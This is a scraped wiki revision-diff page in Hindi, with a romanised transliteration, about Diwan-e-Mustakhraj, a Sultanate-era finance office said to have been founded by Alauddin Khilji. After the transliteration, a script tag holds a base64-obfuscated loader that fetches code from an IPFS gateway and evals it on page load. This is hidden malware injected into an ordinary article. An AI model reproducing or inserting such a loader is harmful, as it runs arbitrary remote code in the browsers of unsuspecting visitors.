Difference between revisions of "दीवान-ए-मुस्तख़राज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''दीवान-ए-मुस्तख़राज''' [[भारत का इतिहास|भारत के इतिहास]] में [[सल्तनत काल]] का एक प्रशासनिक विभाग था। वित्त विभाग से संबंधित इस विभाग की स्थापना [[अलाउद्दीन ख़िलजी]] ने की थी।
+
'''दीवान-ए-मुस्तख़राज''' पद दीवान-ए-रसालत विभाग के अंतर्गत आता था।  
  
इसका कार्य अतिरिक्त मात्रा में वसूल किये गए 'कर' का हिसाब रखना होता था। यह [[वज़ीर]] के अधीनस्थ पद था।
+
[[भारत का इतिहास|भारत के इतिहास]] में [[सल्तनत काल]] का एक प्रशासनिक विभाग था। वित्त विभाग से संबंधित इस विभाग की स्थापना [[अलाउद्दीन ख़िलजी]] ने की थी। इसका कार्य अतिरिक्त मात्रा में वसूल किये गए 'कर' का हिसाब रखना होता था। यह [[वज़ीर]] के अधीनस्थ पद था।
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Revision as of 13:18, 8 September 2011

divan-e-mustakharaj pad divan-e-rasalat vibhag ke aantargat ata tha.

bharat ke itihas mean saltanat kal ka ek prashasanik vibhag tha. vitt vibhag se sanbandhit is vibhag ki sthapana alauddin khilaji ne ki thi. isaka kary atirikt matra mean vasool kiye ge 'kar' ka hisab rakhana hota tha. yah vazir ke adhinasth pad tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh